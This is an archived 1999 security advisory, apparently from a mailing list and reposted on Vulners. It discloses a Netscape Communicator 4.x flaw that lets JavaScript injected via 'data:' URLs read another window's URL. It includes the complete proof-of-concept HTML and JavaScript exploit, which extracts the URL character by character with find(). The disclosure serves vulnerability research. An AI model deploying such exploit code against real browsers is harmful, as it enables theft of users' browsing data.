Vulners
Lucene search
netscape.datatrack.txt
🗓️ 17 Aug 1999 00:00:00Reported by Georgi GuninskiType 
packetstorm🔗 packetstormsecurity.com👁 18 Views
`Date: Sun, 6 Jun 1999 13:17:04 +0300
From: Georgi Guninski <[email protected]>
To: [email protected]
Subject: Netscape Communicator code injection in JavaScript console using "data:" protocol
There is a bug in Netscape Communicator 4.6 Win95, 4.07 Linux (probably
all 4.x are affected), which allows sniffing URLs from another window.
The problem is the injection of JavaScript code in the JavaScript
console using the "data:" protocol.
Access to document.links is disallowed in NC 4.6, but the document may
be read using find().
For more information, examine the source.
Workaround: Disable Javascript.
Demonstration is available at: http://www.nat.bg/~joro/datatrack.html
Regards,
Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski
-----------------------------------------------------------------------
<http://www.nat.bg/~joro/datatrack.html>
<HTML>
<HEAD>
<TITLE>
Control Window
</TITLE>
</HEAD>
<BODY>
<BR>
There is a bug in Netscape Communicator 4.6 Win95, 4.07 Linux (probably others?), which allows sniffing URLs from another window.<BR>
The problem is the injection of JavaScript code in the JavaScript console using "data:" protocol.<BR>
Access to document.links is disallowed in NC 4.6, but the document may be read using find().<BR>
Type your URL in the "Tracked window" and then click "Show URL" in this window.<BR>
Workaround: Disable Javascript.
<BR>
<HR>
<A HREF="javascript:datatrack()">Show URL</A>
<HR>
<A HREF="http://www.nat.bg/~joro">Written by Georgi Guninski</A>
<HR>
<BR>
<BR>
<BR>
<BR>
<BR>
<SCRIPT>
// Clear console
s='wysiwyg://1/data:text/html;,<SCRIPT>window.location = "javascript:@clear"; if (window.location=="JavaScript:@print") top.close(); error</'+'SCRIPT>';
b=window.open(s);
location="javascript:";
setTimeout("b.close();",2000);
/*
a=window.open('wysiwyg://1/about:blank');
a.location="javascript:MBEGIN";
setTimeout("a.close();",2000);
*/
tracked=window.open();
tracked.document.open();
tracked.document.write("<HTML><HEAD><TITLE>Tracked window</TITLE></HEAD>");
tracked.document.write("There is a bug in Netscape Communicator 4.6/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>");
tracked.document.write("Type your URL in the location bar or choose a bookmark.<BR>");
tracked.document.write("Wait until the document is loaded, then click 'Show URL' in the 'Control window'.<BR>");
tracked.document.write("This exploit needs Javascript enabled.<BR>");
tracked.document.close();
</SCRIPT>
<SCRIPT>
function datatrack()
{
tracked.location="javascript:error";
s="wysiwyg://1/data:text/html;,"
+"<SCRIPT> if (document.links.length > 1) "
+"{ "
+" mend='MEND';mag='http://';res=mag;charstoread=40;"
+" msg='Your URL is: \\n';"
+ "setTimeout( ' "
+"for(i=0;i<charstoread;i++) {"
+" t=res;"
+" find(mend);"
+" for(c=1;c<256;c++) {"
+" t=res + String.fromCharCode(c);"
+" if (find(t,true,true)) {"
+" res=t;"
+" if (c==32) i=charstoread;"
+" } "
+" }"
+"}"
+"res=res.substring(mag.length);"
+"confirm(msg+res);top.close();"
+" ',4000);"
+" } else MEND;</"
+"SCRIPT>";
a=window.open(s);
setTimeout('location="javascript:";',3000);
setTimeout('a.close();',2000);
}
</SCRIPT>
</BODY>
</HTML>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Aug 1999 00:00Current
7.4High risk
Vulners AI Score7.4